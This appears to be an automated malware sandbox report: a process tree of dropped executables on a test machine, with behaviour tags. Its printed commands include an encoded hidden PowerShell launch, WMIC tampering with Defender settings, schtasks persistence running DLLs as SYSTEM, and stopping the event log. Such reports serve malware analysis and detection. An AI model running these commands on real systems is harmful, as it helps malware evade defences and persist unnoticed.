  - Scheduled Task/Job: Scheduled Task
  PID:5996
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "LOHPKuWKJcOzSYPZu"
  2⤵
  PID:5576
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 784
  2⤵
  - Program crash
  PID:5456

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:5532
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:1112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:940

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5464

C:\Windows\Temp\OIWUzfnoSeVAWsLl\bLTYzkLUOZBMYfc\OklvlTo.exe
C:\Windows\Temp\OIWUzfnoSeVAWsLl\bLTYzkLUOZBMYfc\OklvlTo.exe mM /xJnNdiddy 385132 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:6072
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "beIeSqxTUIgkrqSZzo"
  2⤵
  PID:3880
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:6020
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:5644
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:6092
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4768
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:5608
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RmqlacUQU\DhfJYe.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ayCOowYLgjutNKI" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:5568
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ayCOowYLgjutNKI2" /F /xml "C:\Program Files (x86)\RmqlacUQU\QCNqlOa.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2036
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "ayCOowYLgjutNKI"
  2⤵
  PID:3912
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ayCOowYLgjutNKI"
  2⤵
  PID:5956
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "AvuuMZnAgveLTP" /F /xml "C:\Program Files (x86)\XYcGyWaqnbhU2\jYoplUh.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5216
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "wHxxZovhMVeXN2" /F /xml "C:\ProgramData\ERCUCymjGgNKOwVB\ewzluku.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3552
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "YEzBJjbnitNtrmmkX2" /F /xml "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\ZcvXHny.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5152
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XgFMMTvgqSOFYnnQAbZ2" /F /xml "C:\Program Files (x86)\qioMUrUoKCErC\uXNJzhu.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1212
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ZNzITvxeQRflwsDJD" /SC once /ST 21:55:19 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\BSwetpbI\TGUetlv.dll\",#1 /jXdidYkG 385132" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:4552
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "ZNzITvxeQRflwsDJD"
  2⤵
  PID:5580
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "dyrOw1" /SC once /ST 11:40:31 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2252
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "dyrOw1"
  2⤵
  PID:5472
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "dyrOw1"
  2⤵
  PID:4012
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "LOHPKuWKJcOzSYPZu"
  2⤵
  PID:2060
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 2344
  2⤵
  - Program crash
  PID:664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5204 -ip 5204
1⤵
PID:5560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:5844
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5972

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5884

C:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\AXChDNl.exe
C:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\AXChDNl.exe MC /pTOFdidyt 525403 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:648
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bIOEZkRAagKtMyjtNl"
  2⤵
  PID:5884
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:5988
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:2044
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:1860
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5872
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:1952
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\nXmjFVOHU\CUgSrT.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHXYugTugXnbcjp" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:3156
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "JHXYugTugXnbcjp2" /F /xml "C:\Program Files (x86)\nXmjFVOHU\tKdeIZH.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:560
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "JHXYugTugXnbcjp"
  2⤵
  PID:6020
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "JHXYugTugXnbcjp"
  2⤵
  PID:5296
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "LfFBsRWwzAIUSz" /F /xml "C:\Program Files (x86)\ANKVsfPAuVEU2\IGnJJps.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1156
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ybYNGucztUodC2" /F /xml "C:\ProgramData\hVWjTjnIaijqmUVB\pisCgeC.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5224
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XPcedSoTrgNFjKDYa2" /F /xml "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\nUdthBM.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1376
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "tFGbXHHzrJEaMkVZkYf2" /F /xml "C:\Program Files (x86)\tuyZfYaPCcjxC\mOuiFMl.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2640
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "TEcaJ1" /SC once /ST 20:23:27 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3656
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "TEcaJ1"
  2⤵
  PID:5984
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "TEcaJ1"
  2⤵
  PID:1904
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "fxxmGIjnSbKlnnNZc"
  2⤵
  PID:4644
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 648 -s 2060
  2⤵
  - Program crash
  PID:2044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5180 -ip 5180
1⤵
PID:2060

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\OIWUzfnoSeVAWsLl\BSwetpbI\TGUetlv.dll",#1 /jXdidYkG 385132
1⤵
PID:6056
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\OIWUzfnoSeVAWsLl\BSwetpbI\TGUetlv.dll",#1 /jXdidYkG 385132
  2⤵
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Enumerates system info in registry
  PID:5252
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "ZNzITvxeQRflwsDJD"
    3⤵
    PID:5728

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:4044
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  PID:5356

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:5640
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:5032
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1928 -parentBuildID 20240401114208 -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 24929 -prefMapSize 245222 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c6f3aba9-5fff-4aa8-b447-34fc2f87b3a5} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" gpu
    3⤵
    PID:4616
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2296 -parentBuildID 20240401114208 -prefsHandle 2264 -prefMapHandle 2260 -prefsLen 24965 -prefMapSize 245222 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3f1689bc-4897-4605-826f-9715bb90d11f} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" socket
    3⤵
    - Checks processor information in registry
    PID:6076
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3728 -childID 1 -isForBrowser -prefsHandle 3720 -prefMapHandle 3716 -prefsLen 25106 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {238abdea-82e9-45c4-a6ab-9898d696c075} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab
    3⤵
    PID:3836
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3556 -childID 2 -isForBrowser -prefsHandle 3612 -prefMapHandle 3644 -prefsLen 29399 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f73b8942-cd6f-4801-95da-6403406815d0} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab
    3⤵
    PID:2040
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4364 -childID 3 -isForBrowser -prefsHandle 4356 -prefMapHandle 4352 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6895749b-7eb4-4273-b6ba-82eaa1f0fbec} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab
    3⤵
    PID:5132
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4960 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4952 -prefMapHandle 4948 -prefsLen 30404 -prefMapSize 245222 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6c7c6948-f0cf-4154-9583-f1e52c2cb1da} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" utility
    3⤵
    - Checks processor information in registry
    PID:4796
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4576 -childID 4 -isForBrowser -prefsHandle 5356 -prefMapHandle 4592 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e344de7c-1591-4600-83d0-4eee22333ac4} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab
    3⤵
    PID:5416
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5752 -childID 5 -isForBrowser -prefsHandle 5764 -prefMapHandle 5760 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {430df9d4-b43c-4cf3-b205-4d2c59f39f89} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab
    3⤵
    PID:5316
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4464 -childID 6 -isForBrowser -prefsHandle 6036 -prefMapHandle 6032 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c1d4f80-52e9-4d03-9bee-4434c5273376} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab
    3⤵
    PID:5728
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5928 -childID 7 -isForBrowser -prefsHandle 4464 -prefMapHandle 4428 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ace4c4d-14d3-4ce2-ae04-54a4fb0de52c} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab
    3⤵
    PID:5624
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6268 -childID 8 -isForBrowser -prefsHandle 6244 -prefMapHandle 6248 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3c475d5d-216a-4f8b-b4b4-ac61415c7766} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab
    3⤵
    PID:6008
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6084 -childID 9 -isForBrowser -prefsHandle 6100 -prefMapHandle 6096 -prefsLen 27622 -prefMapSize 245222 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {11cf2f32-c7da-407c-ad29-8a84c3dd0aae} 5032 "\\.\pipe\gecko-crash-server-pipe.5032" tab
    3⤵
    PID:5324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5104 -ip 5104
1⤵
PID:3188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6072 -ip 6072
1⤵
PID:5004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1492 -ip 1492
1⤵
PID:1528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 648 -ip 648
1⤵
PID:1104

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3512

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5528

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3480

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5692

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5240

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6004

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5308

C:\Users\Admin\Desktop\Setup.exe
"C:\Users\Admin\Desktop\Setup.exe"
1⤵
- Modifies firewall policy service
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4044
- C:\Users\Admin\Documents\SimpleAdobe\abQaeBLwmX9V57tLKTE3eOuX.exe
  C:\Users\Admin\Documents\SimpleAdobe\abQaeBLwmX9V57tLKTE3eOuX.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3580
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:5492
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Checks processor information in registry
    - Suspicious use of SetWindowsHookEx
    PID:1496
- C:\Users\Admin\Documents\SimpleAdobe\6_8BpX05xBxPNdxoMR3fjLwI.exe
  C:\Users\Admin\Documents\SimpleAdobe\6_8BpX05xBxPNdxoMR3fjLwI.exe
  2⤵
  - Executes dropped EXE
  PID:1868
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:5560
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:3980
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:2636
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:3680
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:5480
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:2348
- C:\Users\Admin\Documents\SimpleAdobe\av_cOAXWNrelQa039CGbm0A1.exe
  C:\Users\Admin\Documents\SimpleAdobe\av_cOAXWNrelQa039CGbm0A1.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:6036
- - C:\Users\Admin\AppData\Local\Temp\is-NQPM2.tmp\av_cOAXWNrelQa039CGbm0A1.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-NQPM2.tmp\av_cOAXWNrelQa039CGbm0A1.tmp" /SL5="$80242,5424534,54272,C:\Users\Admin\Documents\SimpleAdobe\av_cOAXWNrelQa039CGbm0A1.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    PID:1784
- C:\Users\Admin\Documents\SimpleAdobe\4Iy1KUXaumS5KWIhCg2YizTi.exe
  C:\Users\Admin\Documents\SimpleAdobe\4Iy1KUXaumS5KWIhCg2YizTi.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetWindowsHookEx
  PID:5448
- C:\Users\Admin\Documents\SimpleAdobe\kJjL0w6C70s0bwCeRI5o95qa.exe
  C:\Users\Admin\Documents\SimpleAdobe\kJjL0w6C70s0bwCeRI5o95qa.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5832
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Checks processor information in registry
    - Suspicious use of SetWindowsHookEx
    PID:2236
- C:\Users\Admin\Documents\SimpleAdobe\IRrr6YljmO8hEIxi45BS9F3G.exe
  C:\Users\Admin\Documents\SimpleAdobe\IRrr6YljmO8hEIxi45BS9F3G.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4912
- C:\Users\Admin\Documents\SimpleAdobe\cRS5O_os57KVEKl2I6n_mlOZ.exe
  C:\Users\Admin\Documents\SimpleAdobe\cRS5O_os57KVEKl2I6n_mlOZ.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5504
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:1612
- C:\Users\Admin\Documents\SimpleAdobe\sxM96ISlNbOtGCb6tmhTPqMM.exe
  C:\Users\Admin\Documents\SimpleAdobe\sxM96ISlNbOtGCb6tmhTPqMM.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  PID:2364
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:3020
- C:\Users\Admin\Documents\SimpleAdobe\7NybowgkTtFNZ6zV5tAShfiu.exe
  C:\Users\Admin\Documents\SimpleAdobe\7NybowgkTtFNZ6zV5tAShfiu.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  PID:6048
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:2956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:6016

C:\Users\Admin\Desktop\Setup.exe
"C:\Users\Admin\Desktop\Setup.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2672

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
